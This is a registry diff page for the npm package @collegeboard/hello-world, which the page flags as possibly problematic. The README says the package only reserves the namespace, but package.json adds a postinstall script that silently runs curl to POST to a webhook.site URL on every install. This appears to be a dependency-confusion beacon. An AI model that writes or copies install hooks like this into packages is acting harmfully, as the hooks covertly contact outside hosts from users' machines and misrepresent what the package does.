@collegeboard/hello-world 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @collegeboard/hello-world might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +7 -0
  2. package/index.js +1 -0
  3. package/package.json +14 -0
package/README.md ADDED
@@ -0,0 +1,7 @@
1
+ # Package Name
2
+
3
+ This package is currently reserved on the npm registry. There are no active contents in this repository, and its primary purpose is to preserve the namespace for future development.
4
+
5
+ Please check back later for updates, or contact the maintainers if you have any specific inquiries.
6
+
7
+ Thank you for your interest.
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log('hello world');
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "@collegeboard/hello-world",
3
+ "version": "1.0.0",
4
+ "description": "hello world",
5
+ "publishConfig": {
6
+ "access": "public"
7
+ },
8
+ "main": "index.js",
9
+ "scripts": {
10
+ "postinstall": "curl -X POST https://webhook.site/11fb4d60-2ea9-41df-9cef-af3daa0109b5 -H 'Content-Type: application/json' -d '{\"message\":\"hello world\"}'"
11
+ },
12
+ "author": "",
13
+ "license": "ISC"
14
+ }